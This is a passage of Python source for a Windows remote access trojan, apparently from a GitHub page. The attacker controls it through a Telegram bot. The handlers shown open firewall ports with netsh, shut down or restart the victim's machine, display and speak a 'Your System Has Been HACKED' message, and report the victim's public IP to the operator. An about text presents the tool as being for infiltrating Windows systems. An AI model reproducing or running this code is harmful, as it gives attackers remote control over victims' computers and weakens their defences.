You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.
Dismiss alert
bot.sendMessage(chat_id , "Target Time Changed to 00:00\n\nHelp: /help\n@The404Hacking\Digital Security ReSearch Group")
# /port [PORT NUMBER]
def port_method(bot , update, args):
os.system('netsh firewall add portopening protocol = TCP port = '+args[0]+' name = "TCP/IP" mode = ENABLE scope = SUBNET')
chat_id = update.message.chat_id
bot.sendMessage(chat_id,"Port Has Been Opened !\n\nPort Number: "+args[0]+"\nProtocol: TCP\nName: TCP/IP\nMode: ENABLE\nScope: SUBNET\n\nHelp: /help\n@The404Hacking\nDigital Security ReSearch Group")
bot.sendMessage(chat_id , "Voice Message Playing !")
sound = pyttsx.init()
sound.setProperty("rate", 110)
sound.say("Your System Has Been HACKED by The404Hacking - Digital Security ReSearch Group")
sound.runAndWait()
chat_id = update.message.chat_id
bot.sendMessage(chat_id , "Voice Message Played !\n\nHelp: /help\n@The404Hacking\nDigital Security ReSearch Group")
# /shutdown
def shutdown_method(bot , update):
chat_id = update.message.chat_id
bot.sendMessage(chat_id, "Shutdown Successfully !\n\nHelp: /help\n@The404Hacking\nDigital Security ReSearch Group")
os.system("shutdown /s /t 1")
# /message
def message_method(bot , update):
os.system("msg * Your System Has Been HACKED by The404Hacking - Digital Security ReSearch Group")
chat_id = update.message.chat_id
bot.sendMessage(chat_id , "HACKED Message has Send !\n\nHelp: /help\n@The404Hacking\nDigital Security ReSearch Group")
# /restart
def restart_method(bot , update):
chat_id = update.message.chat_id
bot.sendMessage(chat_id , "ReStart Successfully !\n\nHelp: /help\n@The404Hacking\nDigital Security ReSearch Group")
os.system("shutdown /r /t 1")
# /ip
def ip_method(bot , update):
ip = urllib.urlopen("https://ip.42.pl/raw").read()
iptxt = ''
iptxt += 'Target IP Public: '+ip+'\n\n'
iptxt += 'Help: /help\n@The404Hacking\nDigital Security ReSearch Group'
chat_id = update.message.chat_id
bot.sendMessage(chat_id, iptxt)
# /about
def about_method(bot , update):
about_text = "\n"
about_text += "Hi !\n"
about_text += "WelCome to Windows-Python-RAT About :)\n"
about_text += "\n"
about_text += "This RAT Created by Sir.4m1R.\n"
about_text += "This is a RAT for Computer Hacking and Infiltration with Microsoft Windows Operating Systems.\n"
about_text += "\n"
about_text += "Using this tool, you can easily perform the Penetration Test on Windows and get the commands that are registered in the management robot to get the Information you want from the Control Panel Robot (Robot management RAT)."
about_text += "\n"
about_text += "This RAT is controlled by a robot in the Telegram. For the robot to work and send Information and logs to you in a telegram, you just have to create a Robot in the Telegram with @BotFather robot."